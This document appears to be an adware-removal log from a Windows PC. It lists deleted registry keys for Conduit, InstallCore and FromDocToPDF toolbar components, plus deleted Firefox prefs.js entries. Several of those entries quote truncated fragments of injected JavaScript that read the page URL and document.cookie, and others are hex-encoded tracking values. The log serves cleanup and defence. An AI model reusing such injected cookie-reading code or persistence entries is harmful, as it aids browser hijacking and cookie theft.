Key Deleted : HKLM\SOFTWARE\Classes\AppID\escorTlbr.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\esrv.EXE
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbCommonUtils.DLL
Key Deleted : HKLM\SOFTWARE\Classes\AppID\TbHelper.EXE
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.PseudoTransparentPlugin
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.PseudoTransparentPlugin.1
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.Radio
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.Radio.1
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.SettingsPlugin
Key Deleted : HKLM\SOFTWARE\Classes\FromDocToPDF_65.SettingsPlugin.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbDownloadManager.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbPropertyManager.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbRequest
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbRequest.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbTask
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.TbTask.1
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper
Key Deleted : HKLM\SOFTWARE\Classes\TbHelper.ToolbarHelper.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.ContextMenuNotifier.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.CustomInternetSecurityImpl.1
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar3.SearchProviderManager.1
Key Deleted : HKLM\SOFTWARE\Classes\.
Key Deleted : HKLM\SOFTWARE\Classes\..9
Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3196716
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{09C554C3-109B-483C-A06B-F14172F1A947}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{628F3201-34D0-49C0-BB9A-82A26AEFB291}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{B12E99ED-69BD-437C-86BE-C862B9E5444D}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{C292AD0A-C11F-479B-B8DB-743E72D283B0}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1C950DE5-D31E-42FB-AFB9-91B0161633D8}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9F34B17E-FF0D-4FAB-97C4-9713FEE79052}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A9A56B8E-2DEB-4ED3-BC92-1FA450BCE1A5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE338F6D-5A7C-4D1D-86E3-C618532079B5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B7FD68F7-D28B-431E-9EE8-E45D915B7F17}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{BC7E25D7-4681-46A3-AF5A-9A1B865783ED}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{C339D489-FABC-41DD-B39D-276101667C70}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CBBEA4B9-B183-47AC-8B1F-FD526AC99A8D}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D433A9D0-8267-40CB-8AD5-24F22FA5373F}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D565B35E-B787-40FA-95E3-E3562F8FC1A0}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{D89031C2-10DA-4C90-9A62-FCED012BC46B}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E0C3A839-0E5E-4EBC-9F8F-E56F8FC732CE}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{0fd6c4b3-4875-4446-9ebc-e51179d7abe9}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{36B445BF-1B84-466A-A623-A360A8CFF8C3}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{6CBF5C01-C876-481B-867E-111CB1D2A7D6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{4E1E9D45-8BF9-4139-915C-9F83CC3D5921}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{74C02D12-FAEE-4834-80D2-5B7D2480AD61}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{D7EE8177-D51E-4F89-92B6-83EA2EC40800}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E3CDDB72-3ADC-4920-B42B-68A8C29FA942}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{BC7E25D7-4681-46A3-AF5A-9A1B865783ED}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{CBBEA4B9-B183-47AC-8B1F-FD526AC99A8D}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{0fd6c4b3-4875-4446-9ebc-e51179d7abe9}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{36B445BF-1B84-466A-A623-

A360A8CFF8C3}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{628F3201-34D0-49C0-BB9A-

82A26AEFB291}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6CBF5C01-C876-481B-867E-

111CB1D2A7D6}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{701F5C41-BB30-46DA-A56B-

68784B0B762B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B975A0-F679-444E-9D94-

6D292FA53140}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D97143C2-4282-496B-BDC4-

7EC852F1497C}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0C3A839-0E5E-4EBC-9F8F-

E56F8FC732CE}
Value Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{C66A678D-5E6C-4AF9-8F57-C6192F42CF74}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{01221FCC-4BFB-461C-B08C-F6D2DF309921}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0FA32667-9A8A-4E9C-902F-CA3323180003}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2A42D13C-D427-4787-821B-CF6973855778}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{36B445BF-1B84-466A-A623-A360A8CFF8C3}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3D8478AA-7B88-48A9-8BCB-B85D594411EC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{452AE416-9A97-44CA-93DA-D0F15C36254F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{45CDA4F7-594C-49A0-AAD1-8224517FE979}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4897BBA6-48D9-468C-8EFA-846275D7701B}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4D8ED2B3-DC62-43EC-ABA3-5B74F046B1BE}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6B458F62-592F-4B25-8967-E6A350A59328}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{6CBF5C01-C876-481B-867E-111CB1D2A7D6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{81E852CC-1FD5-4004-8761-79A48B975E29}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{95B6A271-FEB4-4160-B0FF-44394C21C8DC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B9F43021-60D4-42A6-A065-9BA37F38AC47}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D97143C2-4282-496B-BDC4-7EC852F1497C}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{E67D5BC7-7129-493E-9281-F47BDAFACE4F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FCC9CDD3-EFFF-11D1-A9F0-00A0244AC403}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A5AA24EA-11B8-4113-95AE-

9ED71DEAF12A}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
Key Deleted : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\InstallCore
Key Deleted : HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FromDocToPDF_65bar Uninstall Internet

Explorer
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17496


-\\ Mozilla Firefox v35.0 (x86 en-US)

[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.FXNqB.scode", "try{(function(){try{var url=

(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-

1url.indexOf(\"sumoro[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.VDIQKPIG4.scode", "try{(function(){try{var url=

(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-

1url.indexOf(\"su[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.irmysearch.aflt", "dsites");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.irmysearch.cd",

"2XzuyEtN2Y1L1QzutAzzyCtDyByByD0D0Fzz0F0D0D0CyD0AtN0D0Tzu0SyBzyyDtN1L2XzutBtFtCyBtFtDtFtCtN1L1CzutDtBtCtC1V1PtN1L1G

1B1V1N2Y1L1Qzu2SyEtDyEyCyE0FyByBtGyB0CtAtBtGtDt[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.irmysearch.cr", "1308762248");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.irmysearch.instlRef", "0211_e");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.q5lnQceM.scode", "try{(function(){try{var url=

(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-

1url.indexOf(\"sum[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("extensions.uAk3as.scode", "try{(function(){try{var url=

(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-

1url.indexOf(\"sumor[...]
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E+x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E,x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E-x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E.:2z527", "2423");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E.:2z527.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E.x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E/x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E06CG5EL8:",

"6E6C716F6E6D74727375");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E06CG5EL8:.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E06CG5EL;8I:K",

"247E2D2F226A7472777574737A78797B242F4B49474F42357D5D5C3D");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E06CG5EL;8I:K.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E0x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E1x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E2x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E31;CJ7FK;KG#8QKEF)

TIL.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B

+7E31;CJE9G=BNMLENFAFVFEG.YNQ.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B

+7E31;CJG9KDG<DH??'FDP.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E3x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E4x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E5x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E6x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E7x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E8x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E9x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E:x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E;x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E<x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E=x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E>x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E?x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7E@x305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7EAx305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7EBE3G=;D9N9=D",

"372C2D326975762E3A3C7B3A39434A494841434B265146492965504656496571734D334B57");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7EBE3G=;D9N9=D.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7EBx305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7ECx305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7EDx305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B+7Etx305.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B-0?3G>D",

"3C6F3F40707040417A7045447B2049757A77257D4E7D212A5423212829282B2A282D2B2B");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B-0?3G>D.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B-0?3G@6:5;", "");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B-0?3G@6:5;.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B-0?3GFA7EF", "2B2E2C3D");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B-0?3GFA7EF.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B-3=3ECCJA=F>",

"247E333D2C452F4135276F292A212C393D44307832332A354448584C3A23282E2E3132333435363B466068576C5E6857705A6C60606B666856

3F73796F697861");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B-3=3ECCJA=F>.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B/>01=9A6K6<IM;KRIE@PDAWM",

"6A696B7273747576");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref

("valueApps.CT0000000./9B/>01=9A6K6<IM;KRIE@PDAWM.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B3=>@44I48?",

"372C2D3269757633423633414847203E3D474E4D4C45474F2A554A4D2D5858585E4B554E366352564F");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B3=>@44I48?.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B5BA==9CJAG",

"3A70706D6D6D726D7A7877777B7C754C4A777C2323");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B5BA==9CJAG.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B6B11G4C56B>F;P;ANR@P",

"6E6C716F6E6D7472746F747677");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B6B11G4C56B>F;P;ANR@P.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B90E@.3C;7B=?OFB>>RHIQS",

"393F352F3E");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B90E@.3C;7B=?

OFB>>RHIQS.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B9643G3/9E", "6A");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B9643G3/9E.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B;45>:BI9I7IE", "2B2E2C3D");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B;45>:BI9I7IE.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B<:222H64<", "393F352F3E");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B<:222H64<.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B<:222H64<L8DAJ",

"6D70706E7674717975702A7A78727C7E757C20");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B<:222H64<L8DAJ.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B=+03EH8H8J?:", "4443");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B=+03EH8H8J?:.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B?+E2A52D8",

"372C2D326975762E3A3C7B3A39434A494841434B2651464929655046566470727951555E5E52");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B?+E2A52D8.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B?B0D:8AJ62<H", "6D");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9B?B0D:8AJ62<H.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9BA@0<0BI6A7GN:6@L?", "6C");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000./9BA@0<0BI6A7GN:6@L?.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.PG_ENABLE", "74727565");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.PG_ENABLE.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.SF_JUST_INSTALLED", "46414C5345");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.SF_JUST_INSTALLED.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.SF_STATUS", "454E41424C4544");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.SF_STATUS.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.SF_USER_ID",

"6369645F3237343230313432313130333435323735393833");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.SF_USER_ID.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.cb_experience_000", "36");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.cb_experience_000.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.cb_firstuse0100", "31");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.cb_firstuse0100.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.cb_user_id_000",

"43423738353534373436393337365F313339393637313639353835305F46697265666F78");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.cb_user_id_000.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.cbfirsttime",

"53756E2041707220323720323031342032313A31303A333620474D542D3036303020284D6F756E7461696E205374616E646172642054696D65

29");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.cbfirsttime.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_appStateReportTime",

"31343033353731343332333632");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref

("valueApps.CT0000000.mam_gk_appStateReportTime.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_appsConfig.storedInFile", true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_appsDefaultEnabled",

"6E756C6C");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref

("valueApps.CT0000000.mam_gk_appsDefaultEnabled.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_calledSetupService", "31");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref

("valueApps.CT0000000.mam_gk_calledSetupService.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_currentVersion",

"312E31332E302E3137");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_currentVersion.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_first_time", "31");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_first_time.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_lastLoginTime",

"31343033353731343333373536");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_lastLoginTime.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_localization.storedInFile",

true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_settings1.13.0.17.storedInFile",

true);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_showWelcomeGadget",

"66616C7365");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_showWelcomeGadget.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_stamp", "313139395F30");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_stamp.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_userBornDate",

"3230313430343238");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_userBornDate.storedInFile",

false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_userId",

"64333531636537372D623135652D343266622D396364332D633636653163363162376133");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_userId.storedInFile", false);
[7rgneeol.default\prefs.js] - Line Deleted : user_pref("valueApps.CT0000000.mam_gk_user_approval_interacted", "");
[7rgneeol.default\prefs.js] - Line Deleted : user_pref

("valueApps.CT0000000.mam_gk_user_approval_interacted.storedInFile", false);
